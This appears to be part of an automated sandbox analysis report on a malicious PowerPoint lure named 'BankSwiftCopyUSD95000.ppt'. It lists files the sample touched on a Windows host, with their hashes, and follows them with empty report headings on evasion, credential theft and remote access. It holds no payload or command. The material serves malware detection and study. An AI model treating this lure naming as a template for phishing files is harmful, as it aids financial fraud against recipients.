C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\3416767676-css_bundle_v2[1].css	ASCII text, with very long lines	0BEF7C3D549CA15E5FE23315FC211990	28E3A4693A8F0212850A38303A037A6DDBC14D2E	C91AFADBE63DD834AAC00B49BC715795DA58970E7D500C4BD8F50ED713C77880
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\84067855-widgets[1].js	ASCII text, with very long lines	63642B890AD1CBD4C33DF076775147A8	501936F025C1D9F1EA5401E9743632C6C1284A71	A44D152363BB65AFA637F41D115A093D8E268958D7B69B379A5D205291ADA5C4
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[1].htm	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)	730697C689F5C37C8441656B65C65F91	24C701AEA86212CECE66DD7DD26B3FBD88A93682	908C6760208DE411D85137226ACDC8AD5F061B9700BD55174EABEDFA558F5940
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[2].htm	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)	4D81C371377D85872CDA9F8F8864118F	95F2403317D5A30FFFE85BD92D61198DD5C365B4	2A76F5F170530C3A66BEA30991EFDCF5F8CFD9C5EE537914F57B39163751E90D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[3].htm	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)	6D3F23BA12AE1D4D66D2D12AC6F8A9F0	E075FB33FE3072030364CCC455CDC7F0DC752A49	C75C051D62C1419CA30FF20F17720E0DAB937A71CDC2292C67DB5D33F04F62CC
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[4].htm	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)	FFA6B2FB79EFA27C78F1B8AE7252D22E	62627448338A017F93D49E3D93D506EF617388C9	E25D0467A39DD17C689F94F2C8697B64FF494AC76F3AD1E3D0E658D748C5D5E7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\cookienotice[1].js	ASCII text	A705132A2174F88E196EC3610D68FAA8	3BAD57A48D973A678FEC600D45933010F6EDC659	068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\error[1]	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators	16AA7C3BEBF9C1B84C9EE07666E3207F	BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1	7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\analytics[1].js	ASCII text, with very long lines	53EE95B384D866E8692BB1AEF923B763	A82812B87B667D32A8E51514C578A5175EDD94B4	E441C3E2771625BA05630AB464275136A82C99650EE2145CA5AA9853BEDEB01B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\backbone14[1].htm	HTML document, ASCII text, with very long lines	CD2F00999ED27853590B2EDC1F10A133	176E305E9F63D46A6CB03A368C3E3E6E2365D567	2F37F073E8861DC2074E7CF310E108E036936468CB4F12A363AAF1FC31BA5B31
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\blogin[1].htm	HTML document, ASCII text, with very long lines	84FE5508BBFE1C53A62309FDEFE15D3D	53393903F80154A63BB018D34A22CB2710E533FB	7E39CB5BA2B39A584E8A3FDC746AF5435381E4C43F9C541F5B3CF8159BF6FE23
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\blogin[3].htm	HTML document, ASCII text, with very long lines	10B58BA496D799C0235A21242608116F	85CEF1A13EBCEF0E4C2CF111AF0F7A458FBCA27E	3E550C2C5FF69839A75EFCA67A23A000114E534A853F592A8083AA97D08DF270
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\error[1]	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators	267E302C26E032132179DE088213355D	7BAB512125E561DE8CB6304F85E1C942F1144C52	CB0BA3CA8EB46FDF94EECE50590E21BC1DF2000C0DF63E06C9E9D91F7EB0EFC9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\error[2]	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators	16AA7C3BEBF9C1B84C9EE07666E3207F	BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1	7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\icon18_edit_allbkg[1].gif	GIF image data, version 89a, 18 x 18	C991641178FF05ADF0D004298B5EAFA9	D8F6CE8ECD92B86D49849360F6B81CEB10B4C941	CA9848E6006CFEC8F9FFA29433ADE8152204BDB95579200831C6DC0F53DFF70B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\icon18_wrench_allbkg[1].png	PNG image data, 18 x 18, 8-bit colormap, non-interlaced	F617EFFE6D96C15ACFEA8B2E8AAE551F	6D676AF11AD2E84B620CCE4D5992B657CB2D8AB6	D172D750493BE64A7ED84DEC1DD2A0D787BA42F78BC694B0858F152C52B6620B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\maia[1].css	UTF-8 Unicode text, with very long lines, with no line terminators	9E914FD11C5238C50EBA741A873F0896	950316FFEF900CEECCA4CF847C9A8C14231271DA	8684A32D1A10D050A26FC33192EDF427A5F0C6874C590A68D77AE6E0D186BD8A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\share_buttons_20_3[1].png	PNG image data, 120 x 60, 8-bit/color RGBA, non-interlaced	AD9999106D5F550920B586E8E1704E5A	93FD02C51166402A41F96509CD0CA3FB917877DD	3829A5B2ADE7CFC416C80B8F3DF71E49E68672875F025D525223978F5CEE3FD3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\st2222[1].htm	HTML document, ASCII text, with very long lines	98E5D1F262EBFD9AFC2542E6F9A6A886	6802354CA8583B3A63C8E1CB285BA5257384894B	0906CE83C6E40BB3EBDF2A2B648EB735E3EA53B75C16367EF1BB6930FD67E8EC
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\stback1[1].htm	HTML document, ASCII text, with very long lines	AD61696C5A1D04015DF2FF3709BD5E0D	73F6B22D0B12930A32CA6DFE19FE8D4A46F2E39D	97CE2ADA8A44A9A8F2CCA726172792B2080B341254D2350DD56E4D5AD75B210C
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BankSwiftCopyUSD95000.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Jan 13 20:43:35 2021, length=104448, window=hide	D8B2787B913D71E0A0A5163A1FC63967	A7FE3DF765FDAB05C4BE82F0AB63B0F1BD3425C3	F078FBE707E4D6C86A3DFCC8B175F978505C3A2DE77651BBCB799788A377BC1F
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	5BB7084F6E424324054C931281C6DF42	DC56F7830AC51ADA1C311EED0BB358BB0459B680	D89D12C522386DBDFF572982BDC69C10664078538D4AB16FA871FB81034DF01D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0C80LKLL3RNFORU629R4.temp	data	D62CC9CCF77316A2AA6A729F57925D11	00678A777EC4BF4C3AD3EA8B922FF9481CE5BFDC	93390D2FE903C3BDD52EEB40A7A231B9D176C8C8B54AE580A6681F2E701ACED0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3U3Q2FM73WBY1UE104TU.temp	data	D62CC9CCF77316A2AA6A729F57925D11	00678A777EC4BF4C3AD3EA8B922FF9481CE5BFDC	93390D2FE903C3BDD52EEB40A7A231B9D176C8C8B54AE580A6681F2E701ACED0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8I74OU51TKSDH4DLI8O.temp	data	CFED356B7D3C67E02B444A42748C9C30	9F8F99098E818E40DEF5CEBB79D6750E4218CA39	DF469FB95559F0412C9AF5C3AD77C12F276241ABABF606D60695F40BABCBAF56
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K99IMC5JY7YG7OEZH6Y6.temp	data	D62CC9CCF77316A2AA6A729F57925D11	00678A777EC4BF4C3AD3EA8B922FF9481CE5BFDC	93390D2FE903C3BDD52EEB40A7A231B9D176C8C8B54AE580A6681F2E701ACED0

Analysis Report BankSwiftCopyUSD95000.ppt

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains